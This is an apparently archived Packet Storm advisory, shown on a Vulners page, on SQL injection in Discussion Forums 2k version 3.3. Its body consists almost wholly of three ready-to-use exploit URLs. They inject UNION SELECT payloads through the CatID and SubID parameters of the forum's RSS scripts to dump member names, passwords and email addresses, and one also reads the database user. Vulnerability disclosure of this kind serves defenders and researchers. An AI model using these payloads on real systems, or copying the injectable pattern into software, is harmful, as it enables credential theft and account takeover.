Lucene search

discforums-sql.txt

🗓️ 01 Oct 2008 00:00:00Reported by ~!Dok_tOR!~Type

packetstorm🔗 packetstormsecurity.com👁 13 Views

Discussion Forums 2k SQL Injection Vulnerabilities

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Author: ~!Dok_tOR!~  
Date found: 30.09.08  
Product: Discussion Forums 2k  
Version: 3.3  
URL: http://developer.berlios.de/projects/df2k/  
Vulnerability Class: SQL Injection  
Condition: magic_quotes_gpc = Off  
  
Exploit 1:  
  
http://localhost/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*  
  
Exploit 2:  
  
http://localhost/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*  
  
Exploit 3:  
  
http://localhost/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

01 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4

discussion forums 2k}{sql injection}{vulnerabilities}{security}{exploits